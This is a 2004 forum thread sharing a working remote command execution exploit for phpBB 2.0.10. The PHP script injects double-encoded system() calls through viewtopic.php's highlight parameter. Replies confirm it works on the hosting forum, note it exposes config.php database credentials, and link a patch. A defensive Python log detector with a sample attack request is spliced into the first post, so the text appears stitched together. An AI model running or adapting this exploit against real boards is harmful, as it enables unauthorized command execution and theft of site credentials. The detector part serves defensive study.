phpBB 2.0.10 execute command Exploits

Discussion in 'Open Source' started by firewall, Nov 26, 2004.

Thread Status:
Not open for further replies.
  1. firewall

    firewall New Member

    Joined:
    Mar 31, 2004
    Messages:
    299
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Kolkata - INDIA
    Remote command execution exploit for phpBB 2.0.10 that makes use of a flaw in the viewtopic.php code.

    Code:
    #!/usr/bin/php -q
    <?php
    /*
    # phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
    # 15th November 2004 : 4:04 a.m
    #
    # bug found by How Dark (http://www.howdark.com) (1st October 2004)
    #
    # Requirement:
    #
    #    PHP 4.x with curl extension;
    #
    # ** Selamat Hari Raya **
    */
    
    if (!(function_exists('curl_init'))) {
        echo "cURL extension required\n";
        exit;
    }
    
    if ($argv[2]){
        $url = $argv[1];
        $command = $argv[2];
    }
    else {
        echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
        echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";
        echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
        echo "\ttopic_id\t topic id\n";
        echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
        exit;
    }
    if ($argv[3])
        $topic = $argv[3];
    else
        $topic = 1;
    
    if ($argv[4])
        $proxy = $argv[4];
    
    
    $cmd = str2chr($command);
    
    $action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";       
    $ch=curl_init();
    if ($proxy){
        curl_setopt($ch, CURLOPT_PROXY,$proxy);
    }
    curl_setopt($ch, CURLOPT_URL,$url.$action);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
    $res=curl_exec ($ch);
    curl_close ($ch);
    echo $res;
    
    function str2chr($str){
    
        for($i = 0;$i < strlen($str);$i++){
            $chr .= "chr(".ord($str{$i}).")";
            if ($i != strlen($str) -1)
                 $chr .= "%252e";   
        }
        return $chr;
    }
    ?> 
    --- Don't ask how to use it..... ;) ----
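From a defender's side, the only thing that distinguishes these requests in a web server log is the shape of the `highlight` parameter: it is URL-encoded twice (`%2527` rather than `%27`) so that the quote and the `system(` call survive the first decode. The following detector is an added example for this thread, not code from the original post or from phpBB; it peels the encoding layers off `highlight` in constructed Apache-style log lines (the IPs, timestamps and the function names `decode_layers`, `inspect_highlight` and `scan_log` are all assumptions of this example) and flags entries that are double-encoded and contain a PHP function call or a quote break-out. Ordinary single-encoded searches are left alone.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache/nginx "combined" style request line: client, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
# PHP calls that have no business inside a search highlight string.
PHP_CALL = re.compile(r'\b(system|exec|passthru|shell_exec|chr)\s*\(', re.I)
QUOTE = re.compile(r"['\"`]")

# Constructed sample log lines (not real traffic): one benign search, one
# double-encoded attempt in the form this thread's exploit produces, one
# unrelated page, and one single-encoded quoted search that must not fire.
LOG_LINES = [
    '10.0.0.5 - - [26/Nov/2004:10:00:01 +0530] "GET /html/viewtopic.php?t=5&highlight=firewall+rules HTTP/1.1" 200 5120',
    '10.0.0.9 - - [26/Nov/2004:10:00:07 +0530] "GET /html/viewtopic.php?t=1&highlight=%2527%252esystem(chr(108)%252echr(115)%20)%252e%2527 HTTP/1.1" 200 4870',
    '10.0.0.7 - - [26/Nov/2004:10:00:09 +0530] "GET /html/index.php HTTP/1.1" 200 3000',
    '10.0.0.8 - - [26/Nov/2004:10:00:12 +0530] "GET /html/viewtopic.php?t=3&highlight=%27hello%27 HTTP/1.1" 200 4000',
]


def decode_layers(value, max_layers=3):
    """Repeatedly URL-decode until the string stops changing.

    Returns every layer, raw first; a list longer than two means the value
    was encoded at least twice (the trick that bypasses a single decode).
    """
    layers = [value]
    for _ in range(max_layers):
        nxt = unquote(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers


def raw_params(query):
    """Split a query string without decoding, so encoding depth is preserved."""
    out = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, val = pair.partition('=')
        out.setdefault(unquote(key), []).append(val)
    return out


def inspect_highlight(raw_value):
    """Return the list of reasons a highlight value looks like an exploit attempt."""
    layers = decode_layers(raw_value)
    final = layers[-1]
    double_encoded = len(layers) > 2
    reasons = []
    if double_encoded:
        reasons.append('double-url-encoded')
    if PHP_CALL.search(final):
        reasons.append('php-function-call')
    # A lone quote in a normal search is legitimate; only a quote that
    # surfaces from a second decode points at a break-out of the PHP string.
    if double_encoded and QUOTE.search(final):
        reasons.append('quote-breakout')
    return reasons


def scan_log(lines):
    """Yield one finding per viewtopic.php request whose highlight looks hostile."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('path'))
        if not parts.path.endswith('viewtopic.php'):
            continue
        for raw in raw_params(parts.query).get('highlight', []):
            reasons = inspect_highlight(raw)
            if reasons:
                findings.append({
                    'ip': m.group('ip'),
                    'ts': m.group('ts'),
                    'status': m.group('status'),
                    'decoded': decode_layers(raw)[-1],
                    'reasons': reasons,
                })
    return findings


if __name__ == '__main__':
    for f in scan_log(LOG_LINES):
        print(f"{f['ts']} {f['ip']} -> {f['decoded']!r} ({', '.join(f['reasons'])})")
```

The status code is kept in each finding because, as flashweb notes below, the request still succeeds (HTTP 200) on an unpatched board; a 200 on a flagged line is the signal to check what the web server's user could read, and to upgrade to the fixed release referenced in this thread.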
     
  2. it_waaznt_me

    it_waaznt_me Coming back to life ..

    Joined:
    Nov 30, 2003
    Messages:
    2,023
    Likes Received:
    10
    Trophy Points:
    38
    Location:
    A bit closer to heaven
    Ha Ha ha ...
     
  3. go4inet

    go4inet New Member

    Joined:
    Feb 18, 2004
    Messages:
    300
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Chennai
    lol @ you guys, when you run those exploits, you can see the dbname, dbadmin, dbhost from the config.php file!

    I don't think this is allowed here? Batty?
     
  4. flashweb

    flashweb New Member

    Joined:
    Nov 27, 2004
    Messages:
    35
    Likes Received:
    0
    Trophy Points:
    0
    Yes, the exploit is valid for this forum :)

    But here the forum runs as nobody. Still, it will show the content of PHP files, directory listings, etc. If you run the forum as a privileged user (phpsuexec), anyone can hack the web site. It is very easy to patch this exploit:

    http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
     
  5. go4inet

    go4inet New Member

    Joined:
    Feb 18, 2004
    Messages:
    300
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Chennai
    I am waiting for the Digit forum to update to v2.0.11! Guess that's the latest version!
     